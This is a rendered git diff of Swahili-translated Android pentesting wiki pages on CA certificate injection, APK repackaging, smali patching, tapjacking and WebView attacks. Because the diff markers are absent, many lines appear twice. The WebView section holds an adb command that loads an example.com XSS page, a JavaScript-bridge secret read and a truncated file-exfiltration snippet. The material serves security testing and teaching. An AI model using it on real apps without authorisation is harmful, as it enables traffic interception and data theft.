3. **Kufunga Mount kwa Zygote**: Kwa kutumia `nsenter`, mtu anaingia kwenye eneo la mount la Zygote. Zygote, ikiwa ni mchakato unaohusika na kuzindua programu za Android, inahitaji hatua hii ili kuhakikisha kwamba programu zote zinazozinduliwa kuanzia sasa zinatumia vyeti vya CA vilivyowekwa upya. Amri inayotumika ni:
2. **Kuandaa Vyeti vya CA**: Baada ya kuweka saraka inayoweza kuandikwa, vyeti vya CA ambavyo mtu anakusudia kutumia vinapaswa kunakiliwa kwenye saraka hii. Hii inaweza kujumuisha kunakili vyeti vya kawaida kutoka `/apex/com.android.conscrypt/cacerts/`. Ni muhimu kurekebisha ruhusa na lebo za SELinux za vyeti hivi ipasavyo.
3. **Kufunga Mount kwa Zygote**: Kutumia `nsenter`, mtu anaingia kwenye eneo la mount la Zygote. Zygote, ikiwa ni mchakato unaohusika na kuzindua programu za Android, inahitaji hatua hii ili kuhakikisha kwamba programu zote zinazozinduliwa kuanzia sasa zinatumia vyeti vya CA vilivyowekwa upya. Amri inayotumika ni:
```bash
nsenter --mount=/proc/$ZYGOTE_PID/ns/mnt -- /bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts
```
Hii inahakikisha kwamba kila programu mpya inayozinduliwa itafuata mipangilio ya cheti cha CA kilichosasishwa.
Hii inahakikisha kwamba kila programu mpya inayozinduliwa itafuata mipangilio ya CA certificates iliyosasishwa.
4. **Kuweka Mabadiliko kwa Programu Zinazoendesha**: Ili kuweka mabadiliko kwa programu ambazo tayari zinaendesha, `nsenter` inatumika tena kuingia kwenye eneo la jina la kila programu moja moja na kufanya mtego wa kufunga sawa. Amri inayohitajika ni:
4. **Kuweka Mabadiliko kwa Programu Zinazoendesha**: Ili kuweka mabadiliko kwa programu ambazo tayari zinaendesha, `nsenter` inatumika tena kuingia kwenye namespace ya kila programu moja baada ya nyingine na kufanya mtego wa kufunga sawa. Amri inayohitajika ni:
```bash
nsenter --mount=/proc/$APP_PID/ns/mnt -- /bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts
```
5. **Njia Mbadala - Upya Msoft**: Njia mbadala inahusisha kufanya bind mount kwenye mchakato wa `init` (PID 1) ikifuatiwa na upya msoft wa mfumo wa uendeshaji kwa kutumia amri `stop && start`. Njia hii itasambaza mabadiliko katika majimbo yote, ikiepuka haja ya kushughulikia kila programu inayofanya kazi kwa separately. Hata hivyo, njia hii kwa ujumla haitafutwa sana kutokana na usumbufu wa kuanzisha upya.
5. **Njia Mbadala - Soft Reboot**: Njia mbadala inahusisha kufanya bind mount kwenye mchakato wa `init` (PID 1) ikifuatiwa na soft reboot ya mfumo wa uendeshaji kwa kutumia amri za `stop && start`. Njia hii itasambaza mabadiliko katika majimbo yote, ikiepuka haja ya kushughulikia kila programu inayofanya kazi kwa separately. Hata hivyo, njia hii kwa ujumla haitafutwa sana kutokana na usumbufu wa kuanzisha upya.
## Marejeo
## Marejeleo
- [https://httptoolkit.com/blog/android-14-install-system-ca-certificate/](https://httptoolkit.com/blog/android-14-install-system-ca-certificate/)

10
src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md
View File

@ -1,18 +1,18 @@
{{#include ../../banners/hacktricks-training.md}}
Baadhi ya programu hazipendi vyeti vilivyopakuliwa na mtumiaji, hivyo ili kukagua trafiki ya wavuti kwa baadhi ya programu tunapaswa kwanza ku-decompile programu hiyo na kuongeza mambo machache na kuirekebisha tena.
Baadhi ya programu hazipendi vyeti vilivyopakuliwa na mtumiaji, hivyo ili kukagua trafiki ya wavuti kwa baadhi ya programu tunahitaji kweli kufungua upya programu hiyo na kuongeza mambo machache na kuirejesha.
# Automatic
Zana [**https://github.com/shroudedcode/apk-mitm**](https://github.com/shroudedcode/apk-mitm) itafanya **automatically** mabadiliko muhimu kwenye programu ili kuanza kukamata maombi na pia itazima certificate pinning (ikiwa ipo).
Zana [**https://github.com/shroudedcode/apk-mitm**](https://github.com/shroudedcode/apk-mitm) itafanya **kiotomatiki** mabadiliko muhimu kwenye programu ili kuanza kukamata maombi na pia itazima pinning ya cheti (ikiwa ipo).
# Manual
Kwanza tunadecompile programu: `apktool d *file-name*.apk`
Kwanza tunafungua upya programu: `apktool d *file-name*.apk`
![](../../images/img9.png)
Kisha tunaenda kwenye faili **Manifest.xml** na kuporomoka hadi kwenye tag ya `<\application android>` na tutaongeza mstari ufuatao ikiwa haupo tayari:
Kisha tunaingia kwenye faili ya **Manifest.xml** na kuporomoka hadi kwenye lebo ya `<\application android>` na tutaanza kuongeza mstari ufuatao ikiwa haupo tayari:
`android:networkSecurityConfig="@xml/network_security_config"`
@ -24,7 +24,7 @@ Baada ya kuongeza:
![](../../images/img11.png)
Sasa ingia kwenye folda **res/xml** na uunde/badilisha faili inayoitwa network_security_config.xml yenye maudhui yafuatayo:
Sasa ingia kwenye folda ya **res/xml** na uunde/badilisha faili inayoitwa network_security_config.xml yenye maudhui yafuatayo:
```markup
<network-security-config>
<base-config>

18
src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md
View File

@ -4,30 +4,30 @@
Katika eneo la **usalama wa programu**, mchakato wa kufanya msimbo uliofichwa kueleweka, unaojulikana kama **de-obfuscation**, ni muhimu. Mwongo huu unachunguza mikakati mbalimbali ya de-obfuscation, ukizingatia mbinu za uchambuzi wa statiki na kutambua mifumo ya obfuscation. Aidha, unatoa zoezi la matumizi ya vitendo na kupendekeza rasilimali zaidi kwa wale wanaopenda kuchunguza mada za juu zaidi.
### **Strategies for Static De-obfuscation**
### **Mikakati ya Static De-obfuscation**
Wakati wa kushughulika na **obfuscated code**, mikakati kadhaa inaweza kutumika kulingana na asili ya obfuscation:
- **DEX bytecode (Java)**: Njia moja yenye ufanisi ni kutambua mbinu za de-obfuscation za programu, kisha kuiga mbinu hizi katika faili ya Java. Faili hii inatekelezwa ili kubadilisha obfuscation kwenye vipengele vilivyokusudiwa.
- **Java na Native Code**: Njia nyingine ni kutafsiri algorithimu ya de-obfuscation kuwa lugha ya skripti kama Python. Mkakati huu unasisitiza kwamba lengo kuu si kuelewa kikamilifu algorithimu bali kuitekeleza kwa ufanisi.
- **DEX bytecode (Java)**: Njia moja yenye ufanisi ni kutambua mbinu za de-obfuscation za programu, kisha kuiga mbinu hizi katika faili la Java. Faili hii inatekelezwa ili kubadilisha obfuscation kwenye vipengele vilivyokusudiwa.
- **Java na Native Code**: Njia nyingine ni kutafsiri algorithimu ya de-obfuscation katika lugha ya skripti kama Python. Mikakati hii inaonyesha kwamba lengo kuu si kuelewa kikamilifu algorithimu bali kuitekeleza kwa ufanisi.
### **Identifying Obfuscation**
### **Kutambua Obfuscation**
Kutambua msimbo uliofichwa ni hatua ya kwanza katika mchakato wa de-obfuscation. Viashiria muhimu ni pamoja na:
- **ukosefu au kuchanganya kwa nyuzi** katika Java na Android, ambayo inaweza kuashiria obfuscation ya nyuzi.
- **uwepo wa faili za binary** katika saraka ya mali au wito kwa `DexClassLoader`, ukionyesha unpacking ya msimbo na upakiaji wa dynamic.
- Matumizi ya **maktaba za asili pamoja na kazi za JNI zisizoweza kutambulika**, zikionyesha uwezekano wa obfuscation ya mbinu za asili.
- Matumizi ya **maktaba za asili pamoja na kazi za JNI zisizoweza kutambulika**, kuashiria uwezekano wa obfuscation ya mbinu za asili.
## **Dynamic Analysis in De-obfuscation**
Kwa kutekeleza msimbo katika mazingira yaliyodhibitiwa, uchambuzi wa dynamic **unaruhusu kuangalia jinsi msimbo uliofichwa unavyofanya kazi kwa wakati halisi**. Njia hii ni bora katika kufichua kazi za ndani za mifumo tata ya obfuscation ambayo imeundwa kuficha nia halisi ya msimbo.
### **Applications of Dynamic Analysis**
### **Maombi ya Dynamic Analysis**
- **Runtime Decryption**: Mbinu nyingi za obfuscation zinahusisha kuficha nyuzi au sehemu za msimbo ambazo zinafichuliwa tu wakati wa utekelezaji. Kupitia uchambuzi wa dynamic, vipengele hivi vilivyofichwa vinaweza kukamatwa wakati wa ufichuzi, vikifunua sura yao halisi.
- **Identifying Obfuscation Techniques**: Kwa kufuatilia tabia ya programu, uchambuzi wa dynamic unaweza kusaidia kutambua mbinu maalum za obfuscation zinazotumika, kama vile virtualization ya msimbo, packers, au uzalishaji wa msimbo wa dynamic.
- **Uncovering Hidden Functionality**: Msimbo uliofichwa unaweza kuwa na kazi zilizofichwa ambazo hazionekani kupitia uchambuzi wa statiki pekee. Uchambuzi wa dynamic unaruhusu kuangalia njia zote za msimbo, ikiwa ni pamoja na zile zinazotekelezwa kwa masharti, ili kufichua kazi hizo zilizofichwa.
- **Runtime Decryption**: Mbinu nyingi za obfuscation zinahusisha kuficha nyuzi au sehemu za msimbo ambazo zinafichuliwa tu wakati wa utekelezaji. Kupitia uchambuzi wa dynamic, vipengele hivi vilivyofichwa vinaweza kukamatwa wakati wa kufichuliwa, vikifunua sura yao halisi.
- **Kutambua Mbinu za Obfuscation**: Kwa kufuatilia tabia ya programu, uchambuzi wa dynamic unaweza kusaidia kutambua mbinu maalum za obfuscation zinazotumika, kama vile virtualization ya msimbo, packers, au uzalishaji wa msimbo wa dynamic.
- **Kufichua Uwezo wa Siri**: Msimbo uliofichwa unaweza kuwa na uwezo wa siri ambao hauonekani kupitia uchambuzi wa statiki pekee. Uchambuzi wa dynamic unaruhusu kuangalia njia zote za msimbo, ikiwa ni pamoja na zile zinazotekelezwa kwa masharti, ili kufichua uwezo huo wa siri.
## References and Further Reading

2
src/mobile-pentesting/android-app-pentesting/react-native-application.md
View File

@ -32,7 +32,7 @@ Ili kutafuta akidi nyeti na mwisho, fuata hatua hizi:
3. Ilikuwa na bahati kwamba akidi nyeti zilizowekwa kwa mikono zilipatikana katika msimbo wa JavaScript wakati wa mchakato wa recon.
## Marejeleo
## References
- [https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7](https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7)

8
src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
View File

@ -17,17 +17,17 @@ Programu za Android zinaweza kutumia maktaba za asili, ambazo kwa kawaida zimean
- JNI inaruhusu mbinu za Java kutekelezwa katika msimbo wa asili.
- NDK ni seti maalum ya zana za Android za kuandika msimbo wa asili.
- JNI na NDK huunganisha msimbo wa Java (au Kotlin) na maktaba za asili.
- **Kuhifadhi na Kutekeleza Maktaba:**
- **Kuweka na Kutekeleza Maktaba:**
- Maktaba zinawekwa kwenye kumbukumbu kwa kutumia `System.loadLibrary` au `System.load`.
- JNI_OnLoad inatekelezwa wakati wa kuhifadhi maktaba.
- JNI_OnLoad inatekelezwa wakati wa kuweka maktaba.
- Mbinu za asili zilizotangazwa na Java huunganisha na kazi za asili, kuruhusu utekelezaji.
- **Kuunganisha Mbinu za Java na Kazi za Asili:**
- **Kuunganisha Kitaalamu:** Majina ya kazi katika maktaba za asili yanalingana na muundo maalum, kuruhusu kuunganisha kiotomatiki.
- **Kuunganisha Kikatiba:** Inatumia `RegisterNatives` kwa kuunganisha, ikitoa kubadilika katika uandishi wa majina ya kazi na muundo.
- **Kuunganisha Kikatiba:** Inatumia `RegisterNatives` kwa kuunganisha, ikitoa kubadilika katika majina na muundo wa kazi.
- **Zana na Mbinu za Kurekebisha:**
- Zana kama Ghidra na IDA Pro husaidia kuchambua maktaba za asili.
- `JNIEnv` ni muhimu kwa kuelewa kazi na mwingiliano wa JNI.
- Mazoezi yanatolewa ili kufanyia mazoezi kuhifadhi maktaba, kuunganisha mbinu, na kutambua kazi za asili.
- Mazoezi yanatolewa ili kufanyia mazoezi kuweka maktaba, kuunganisha mbinu, na kutambua kazi za asili.
### Rasilimali:

16
src/mobile-pentesting/android-app-pentesting/smali-changes.md
View File

@ -2,13 +2,13 @@
{{#include ../../banners/hacktricks-training.md}}
Wakati mwingine ni ya kuvutia kubadilisha msimbo wa programu ili kupata taarifa zilizofichwa kwako (labda nywila au bendera zilizofichwa vizuri). Kisha, inaweza kuwa ya kuvutia decompile apk, badilisha msimbo na ucompile tena.
Wakati mwingine ni ya kuvutia kubadilisha msimbo wa programu ili kupata habari zilizofichwa kwako (labda nywila au bendera zilizofichwa vizuri). Kisha, inaweza kuwa ya kuvutia decompile apk, badilisha msimbo na ucompile tena.
**Marejeleo ya Opcodes:** [http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html)
## Njia ya Haraka
Kwa kutumia **Visual Studio Code** na nyongeza ya [APKLab](https://github.com/APKLab/APKLab), unaweza **decompile kiotomatiki**, badilisha, **compile tena**, saini na usakinishe programu bila kutekeleza amri yoyote.
Kwa kutumia **Visual Studio Code** na nyongeza ya [APKLab](https://github.com/APKLab/APKLab), unaweza **decompile kiotomatiki**, badilisha, **compile tena**, saini na kusakinisha programu bila kutekeleza amri yoyote.
**Script** nyingine inayorahisisha kazi hii sana ni [**https://github.com/ax/apk.sh**](https://github.com/ax/apk.sh)
@ -44,13 +44,13 @@ Baada ya kubadilisha msimbo unaweza **kurekebisha** msimbo kwa kutumia:
```bash
apktool b . #In the folder generated when you decompiled the application
```
Itakuwa **kazi** ya APK mpya **ndani** ya folda _**dist**_.
Itakuwa **nafasi** ya **kuunda** APK mpya **ndani** ya folda _**dist**_.
Ikiwa **apktool** itatoa **makosa**, jaribu [kusanidi **toleo jipya**](https://ibotpeaches.github.io/Apktool/install/)
Ikiwa **apktool** itatoa **makosa**, jaribu[ kufunga **toleo jipya**](https://ibotpeaches.github.io/Apktool/install/)
### **Saini APK mpya**
Kisha, unahitaji **kuunda funguo** (utahitaji kutolewa nenosiri na taarifa zingine ambazo unaweza kujaza kwa bahati nasibu):
Kisha, unahitaji **kuunda funguo** (utahitaji kupewa nenosiri na taarifa zingine ambazo unaweza kujaza kwa bahati):
```bash
keytool -genkey -v -keystore key.jks -keyalg RSA -keysize 2048 -validity 10000 -alias <your-alias>
```
@ -67,7 +67,7 @@ zipalign -v 4 infile.apk
```
### **Saini APK mpya (tena?)**
Ikiwa unataka kutumia [**apksigner**](https://developer.android.com/studio/command-line/) badala ya jarsigner, **unapaswa kusaini apk** baada ya kutumia **ukandamizaji na** zipaling. LAKINI KUMBUKA KWAMBA UNAPASWA KUSAINI TU **PROGRAMU KIMOJA** KWA jarsigner (kabla ya zipalign) AU KWA aspsigner (baada ya zipaling).
Ikiwa unataka kutumia [**apksigner**](https://developer.android.com/studio/command-line/) badala ya jarsigner, **unapaswa kusaini apk** baada ya kutumia **ukandamizaji na** zipaling. LAKINI KUMBUKA KWAMBA UNAPASWA **KUSAINI PROGRAMU MARA MOJA TU** KWA jarsigner (kabla ya zipalign) AU KWA aspsigner (baada ya zipaling).
```bash
apksigner sign --ks key.jks ./dist/mycompiled.apk
```
@ -142,14 +142,14 @@ Mapendekezo:
- Ikiwa unataka kutumia mabadiliko yaliyotangazwa ndani ya kazi (yaliyotangazwa v0,v1,v2...) weka mistari hii kati ya _.local \<nambari>_ na matangazo ya mabadiliko (_const v0, 0x1_)
- Ikiwa unataka kuweka msimbo wa kuandika katikati ya msimbo wa kazi:
- Ongeza 2 kwa idadi ya mabadiliko yaliyotangazwa: Mfano: kutoka _.locals 10_ hadi _.locals 12_
- Mabadiliko mapya yanapaswa kuwa nambari zinazofuata za mabadiliko yaliyotangazwa tayari (katika mfano huu inapaswa kuwa _v10_ na _v11_, kumbuka kwamba inaanza katika v0).
- Mabadiliko mapya yanapaswa kuwa nambari zinazofuata za mabadiliko yaliyotangazwa tayari (katika mfano huu yanapaswa kuwa _v10_ na _v11_, kumbuka kwamba inaanza na v0).
- Badilisha msimbo wa kazi ya kuandika na tumia _v10_ na _v11_ badala ya _v5_ na _v1_.
### Toasting
Kumbuka kuongeza 3 kwa idadi ya _.locals_ mwanzoni mwa kazi.
Msimbo huu umeandaliwa kuingizwa katika **katikati ya kazi** (**badilisha** nambari ya **mabadiliko** kama inavyohitajika). Itachukua **thamani ya this.o**, **kubadilisha** kuwa **String** na kisha **kutengeneza** **toast** na thamani yake.
Msimbo huu umeandaliwa kuingizwa katika **katikati ya kazi** (**badilisha** nambari ya **mabadiliko** kama inavyohitajika). Itachukua **thamani ya this.o**, **kubadilisha** kuwa **String** na kisha **kufanya** **toast** na thamani yake.
```bash
const/4 v10, 0x1
const/4 v11, 0x1

10
src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md
View File

@ -1,6 +1,6 @@
{{#include ../../banners/hacktricks-training.md}}
Katika hali ambapo programu imewekwa mipaka kwa nchi fulani, na huwezi kuisakinisha kwenye kifaa chako cha Android kutokana na vikwazo vya kikanda, kubadilisha eneo lako kuwa nchi ambapo programu hiyo inapatikana kunaweza kukupa ufikiaji. Hatua zilizo hapa chini zinaelezea jinsi ya kufanya hivyo:
Katika hali ambapo programu imewekwa mipaka kwa nchi fulani, na huwezi kuisakinisha kwenye kifaa chako cha Android kutokana na vikwazo vya kikanda, kudanganya eneo lako hadi nchi ambapo programu inapatikana kunaweza kukupa ufikiaji. Hatua zilizo hapa chini zinaelezea jinsi ya kufanya hivyo:
1. **Sakinisha Hotspot Shield Free VPN Proxy:**
@ -11,13 +11,13 @@ Katika hali ambapo programu imewekwa mipaka kwa nchi fulani, na huwezi kuisakini
- Fungua programu ya Hotspot Shield.
- Unganisha na server ya VPN kwa kuchagua nchi ambapo programu unayotaka kufikia inapatikana.
3. **Futa Takwimu za Google Play Store:**
3. **Futa Data za Google Play Store:**
- Nenda kwenye **Mipangilio** ya kifaa chako.
- Endelea kwenye **Programu** au **Meneja wa Programu** (hii inaweza kutofautiana kulingana na kifaa chako).
- Tafuta na uchague **Google Play Store** kutoka kwenye orodha ya programu.
- Gonga **Lazimisha Kusitisha** ili kumaliza mchakato wowote unaoendelea wa programu hiyo.
- Kisha gonga **Futa Takwimu** au **Futa Hifadhi** (maneno halisi yanaweza kutofautiana) ili kurejesha programu ya Google Play Store kwenye hali yake ya awali.
- Gonga **Lazimisha Kusitisha** ili kumaliza mchakato wowote unaoendelea wa programu.
- Kisha gonga **Futa Data** au **Futa Hifadhi** (maneno halisi yanaweza kutofautiana) ili kurejesha programu ya Google Play Store kwenye hali yake ya awali.
4. **Fikia Programu Iliyowekwa Mipaka:**
- Fungua **Google Play Store**.
@ -26,7 +26,7 @@ Katika hali ambapo programu imewekwa mipaka kwa nchi fulani, na huwezi kuisakini
### Maelezo Muhimu:
- Ufanisi wa njia hii unaweza kutofautiana kulingana na mambo kadhaa ikiwa ni pamoja na uaminifu wa huduma ya VPN na vikwazo maalum vya kikanda vilivyowekwa na programu hiyo.
- Ufanisi wa njia hii unaweza kutofautiana kulingana na mambo kadhaa ikiwa ni pamoja na uaminifu wa huduma ya VPN na vikwazo maalum vya kikanda vilivyowekwa na programu.
- Kutumia VPN mara kwa mara kunaweza kuathiri utendaji wa programu na huduma zingine.
- Kuwa makini na masharti ya huduma ya programu au huduma yoyote unayotumia, kwani kutumia VPN kupita vikwazo vya kikanda kunaweza kukiuka masharti hayo.

6
src/mobile-pentesting/android-app-pentesting/tapjacking.md
View File

@ -6,7 +6,7 @@
## **Basic Information**
**Tapjacking** ni shambulio ambapo **programu mbaya** inazinduliwa na **kujiweka juu ya programu ya mwathirika**. Mara inapoificha waziwazi programu ya mwathirika, kiolesura chake cha mtumiaji kimeundwa kwa njia ya kudanganya mtumiaji kuingiliana nayo, wakati inapitisha mwingiliano huo kwa programu ya mwathirika.\
Kwa hivyo, inafanya **mtumiaji kuwa kipofu na kutokujua kwamba kwa kweli anafanya vitendo kwenye programu ya mwathirika**.
Kwa hivyo, inafanya **mtumiaji kuwa kipofu na kutokujua kwamba kwa kweli wanatekeleza vitendo kwenye programu ya mwathirika**.
### Detection
@ -20,7 +20,7 @@ Ili kugundua programu zinazoweza kuathiriwa na shambulio hili unapaswa kutafuta
#### `filterTouchesWhenObscured`
Ikiwa **`android:filterTouchesWhenObscured`** imewekwa kuwa **`true`**, `View` haitapokea kugusa wakati dirisha la mtazamo limefichwa na dirisha lingine linaloonekana.
Ikiwa **`android:filterTouchesWhenObscured`** imewekwa kuwa **`true`**, `View` haitapokea mguso wakati dirisha la mtazamo linapofichwa na dirisha lingine linaloonekana.
#### **`setFilterTouchesWhenObscured`**
@ -44,7 +44,7 @@ Fuata **maagizo ya README ili kuitumia**.
### FloatingWindowApp
Mradi mfano unaotekeleza **FloatingWindowApp**, ambayo inaweza kutumika kuweka juu ya shughuli nyingine ili kufanya shambulio la clickjacking, unaweza kupatikana katika [**FloatingWindowApp**](https://github.com/aminography/FloatingWindowApp) (ni ya zamani kidogo, bahati nzuri katika kujenga apk).
Mradi mfano unaotekeleza **FloatingWindowApp**, ambayo inaweza kutumika kuweka juu ya shughuli nyingine ili kufanya shambulio la clickjacking, inaweza kupatikana katika [**FloatingWindowApp**](https://github.com/aminography/FloatingWindowApp) (ni ya zamani kidogo, bahati njema katika kujenga apk).
### Qark

22
src/mobile-pentesting/android-app-pentesting/webview-attacks.md
View File

@ -2,7 +2,7 @@
{{#include ../../banners/hacktricks-training.md}}
## Mwongozo juu ya Mipangilio na Usalama wa WebView
## Mwongozo wa Mipangilio na Usalama wa WebView
### Muhtasari wa Uhalifu wa WebView
@ -16,22 +16,22 @@ Kwa kawaida, WebViews zinaruhusu upatikanaji wa faili. Kazi hii inasimamiwa na n
#### **Vipengele Vilivyopitwa na Wakati: Upatikanaji wa Kijumla na Upatikanaji wa Faili Kutoka kwa URLs**
- **Upatikanaji wa Kijumla Kutoka kwa URLs za Faili**: Kipengele hiki kilichopitwa na wakati kiliruhusu maombi ya kuvuka mipaka kutoka kwa URLs za faili, na kuleta hatari kubwa ya usalama kutokana na mashambulizi ya XSS. Mipangilio ya kawaida imezimwa (`false`) kwa programu zinazolenga Android Jelly Bean na mpya.
- **Upatikanaji wa Kijumla Kutoka kwa URL za Faili**: Kipengele hiki kilichopitwa na wakati kiliruhusu maombi ya kuvuka mipaka kutoka kwa URL za faili, na kuleta hatari kubwa ya usalama kutokana na mashambulizi ya XSS. Mipangilio ya kawaida imezimwa (`false`) kwa programu zinazolenga Android Jelly Bean na mpya.
- Ili kuangalia mipangilio hii, tumia `getAllowUniversalAccessFromFileURLs()`.
- Ili kubadilisha mipangilio hii, tumia `setAllowUniversalAccessFromFileURLs(boolean)`.
- **Upatikanaji wa Faili Kutoka kwa URLs za Faili**: Kipengele hiki, pia kilichopitwa na wakati, kilisimamia upatikanaji wa maudhui kutoka kwa URLs zingine za mpango wa faili. Kama upatikanaji wa kijumla, mipangilio yake ya kawaida imezimwa kwa usalama zaidi.
- **Upatikanaji wa Faili Kutoka kwa URL za Faili**: Kipengele hiki, pia kilichopitwa na wakati, kilisimamia upatikanaji wa maudhui kutoka kwa URL nyingine za mpango wa faili. Kama upatikanaji wa kijumla, mipangilio yake ya kawaida imezimwa kwa usalama zaidi.
- Tumia `getAllowFileAccessFromFileURLs()` kuangalia na `setAllowFileAccessFromFileURLs(boolean)` kuweka.
#### **Kuhifadhi Faili kwa Usalama**
Ili kuzima upatikanaji wa mfumo wa faili wakati bado unapata mali na rasilimali, njia ya `setAllowFileAccess()` inatumika. Pamoja na Android R na juu, mipangilio ya kawaida ni `false`.
Ili kuzima upatikanaji wa mfumo wa faili wakati bado unapata mali na rasilimali, njia ya `setAllowFileAccess()` inatumika. Pamoja na Android R na zaidi, mipangilio ya kawaida ni `false`.
- Angalia kwa `getAllowFileAccess()`.
- Wezesha au zima kwa `setAllowFileAccess(boolean)`.
- Washa au zima kwa `setAllowFileAccess(boolean)`.
#### **WebViewAssetLoader**
Darasa la **WebViewAssetLoader** ni njia ya kisasa ya kupakia faili za ndani. Linatumia http(s) URLs kwa ajili ya kupata mali na rasilimali za ndani, likikubaliana na sera ya Same-Origin, hivyo kurahisisha usimamizi wa CORS.
Darasa la **WebViewAssetLoader** ni njia ya kisasa ya kupakia faili za ndani. Linatumia http(s) URLs kwa kupata mali na rasilimali za ndani, likikubaliana na sera ya Same-Origin, hivyo kurahisisha usimamizi wa CORS.
### loadUrl
@ -43,12 +43,12 @@ Ofc, mshambuliaji wa uwezekano hapaswi kamwe kuwa na uwezo wa **kudhibiti URL**
### **JavaScript na Usimamizi wa Mpango wa Intent**
- **JavaScript**: Imezuiliwa kwa default katika WebViews, inaweza kuwezeshwa kupitia `setJavaScriptEnabled()`. Tahadhari inashauriwa kwani kuwezesha JavaScript bila ulinzi sahihi kunaweza kuleta udhaifu wa usalama.
- **Mpango wa Intent**: WebViews zinaweza kushughulikia mpango wa `intent`, ambayo inaweza kusababisha mashambulizi ikiwa haitasimamiwa kwa makini. Mfano wa udhaifu ulijumuisha parameter ya WebView iliyo wazi "support_url" ambayo inaweza kutumika kutekeleza mashambulizi ya cross-site scripting (XSS).
- **JavaScript**: Imezuiliwa kwa default katika WebViews, inaweza kuwezeshwa kupitia `setJavaScriptEnabled()`. Tahadhari inashauriwa kwani kuwezesha JavaScript bila hatua sahihi za usalama kunaweza kuleta udhaifu wa usalama.
- **Mpango wa Intent**: WebViews zinaweza kushughulikia mpango wa `intent`, ambayo inaweza kusababisha matumizi mabaya ikiwa haitasimamiwa kwa makini. Mfano wa udhaifu ulijumuisha parameter ya WebView iliyo wazi "support_url" ambayo inaweza kutumika kutekeleza mashambulizi ya cross-site scripting (XSS).
![Vulnerable WebView](<../../images/image (1191).png>)
Mfano wa unyakuzi ukitumia adb:
Mfano wa matumizi mabaya ukitumia adb:
```bash
adb.exe shell am start -n com.tmh.vulnwebview/.SupportWebView es support_url "https://example.com/xss.html"
```
@ -80,7 +80,7 @@ alert(javascriptBridge.getSecret())
```
- Ili kupunguza hatari, **punguza matumizi ya daraja la JavaScript** kwa msimbo uliotumwa na APK na kuzuia upakiaji wa JavaScript kutoka vyanzo vya mbali. Kwa vifaa vya zamani, weka kiwango cha chini cha API kuwa 17.
### Utekelezaji wa Msimbo wa Mbali kwa Kutumia Reflection (RCE)
### Utekelezaji wa Msimbo wa K remote kwa Kutumia Reflection (RCE)
- Njia iliyoandikwa inaruhusu kufikia RCE kupitia reflection kwa kutekeleza payload maalum. Hata hivyo, annotation ya `@JavascriptInterface` inazuia ufikiaji wa njia zisizoidhinishwa, ikipunguza uso wa shambulio.
@ -105,7 +105,7 @@ if (0 != (getApplicationInfo().flags & ApplicationInfo.FLAG_DEBUGGABLE))
```
## Exfiltrate arbitrary files
- Inaonyesha uhamasishaji wa faili za kawaida kwa kutumia XMLHttpRequest:
- Inaonyesha uhamasishaji wa faili zisizo na mpangilio kwa kutumia XMLHttpRequest:
```javascript
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {

14
src/mobile-pentesting/android-checklist.md
View File

@ -7,7 +7,7 @@
- [ ] [Misingi](android-app-pentesting/#fundamentals-review)
- [ ] [Dalvik & Smali](android-app-pentesting/#dalvik--smali)
- [ ] [Nukta za kuingia](android-app-pentesting/#application-entry-points)
- [ ] [Nafasi za kuingia](android-app-pentesting/#application-entry-points)
- [ ] [Shughuli](android-app-pentesting/#launcher-activity)
- [ ] [Mipango ya URL](android-app-pentesting/#url-schemes)
- [ ] [Watoa maudhui](android-app-pentesting/#services)
@ -21,11 +21,11 @@
### [Static Analysis](android-app-pentesting/#static-analysis)
- [ ] Angalia matumizi ya [obfuscation](android-checklist.md#some-obfuscation-deobfuscation-information), angalia kama simu imekuwa rooted, kama emulator inatumika na angalia anti-tampering. [Soma hii kwa maelezo zaidi](android-app-pentesting/#other-checks).
- [ ] Programu nyeti (kama programu za benki) zinapaswa kuangalia kama simu imekuwa rooted na zinapaswa kuchukua hatua kwa mujibu wa hali hiyo.
- [ ] Tafuta [nyuzi za kuvutia](android-app-pentesting/#looking-for-interesting-info) (nywila, URL, API, usimbuaji, backdoors, tokens, Bluetooth uuids...).
- [ ] Angalia matumizi ya [obfuscation](android-checklist.md#some-obfuscation-deobfuscation-information), angalia kama simu imekuwa rooted, kama emulator inatumika na ukaguzi wa kupambana na kuingiliwa. [Soma hii kwa maelezo zaidi](android-app-pentesting/#other-checks).
- [ ] Programu nyeti (kama programu za benki) zinapaswa kuangalia kama simu imekuwa rooted na zinapaswa kuchukua hatua kwa mujibu wa hilo.
- [ ] Tafuta [nyuzi za kuvutia](android-app-pentesting/#looking-for-interesting-info) (nywila, URLs, API, usimbuaji, milango ya nyuma, tokens, Bluetooth uuids...).
- [ ] Kipaumbele maalum kwa [firebase ](android-app-pentesting/#firebase)APIs.
- [ ] [Soma manifesti:](android-app-pentesting/#basic-understanding-of-the-application-manifest-xml)
- [ ] [Soma manifest:](android-app-pentesting/#basic-understanding-of-the-application-manifest-xml)
- [ ] Angalia kama programu iko katika hali ya debug na jaribu "kuikabili"
- [ ] Angalia kama APK inaruhusu nakala za akiba
- [ ] Shughuli zilizotolewa
@ -46,11 +46,11 @@
- [ ] [Shughuli zilizofichuliwa zinazoweza kutumika](android-app-pentesting/#exploiting-exported-activities-authorisation-bypass)?
- [ ] [Watoa maudhui wanaoweza kutumika](android-app-pentesting/#exploiting-content-providers-accessing-and-manipulating-sensitive-information)?
- [ ] [Huduma zilizofichuliwa zinazoweza kutumika](android-app-pentesting/#exploiting-services)?
- [ ] [Vikumbusho vya matangazo vinavyoweza kutumika](android-app-pentesting/#exploiting-broadcast-receivers)?
- [ ] [Vipokezi vya matangazo vinavyoweza kutumika](android-app-pentesting/#exploiting-broadcast-receivers)?
- [ ] Je, programu [inasambaza taarifa kwa maandiko wazi/ikitumia algorithimu dhaifu](android-app-pentesting/#insufficient-transport-layer-protection)? Je, MitM inawezekana?
- [ ] [Kagua trafiki ya HTTP/HTTPS](android-app-pentesting/#inspecting-http-traffic)
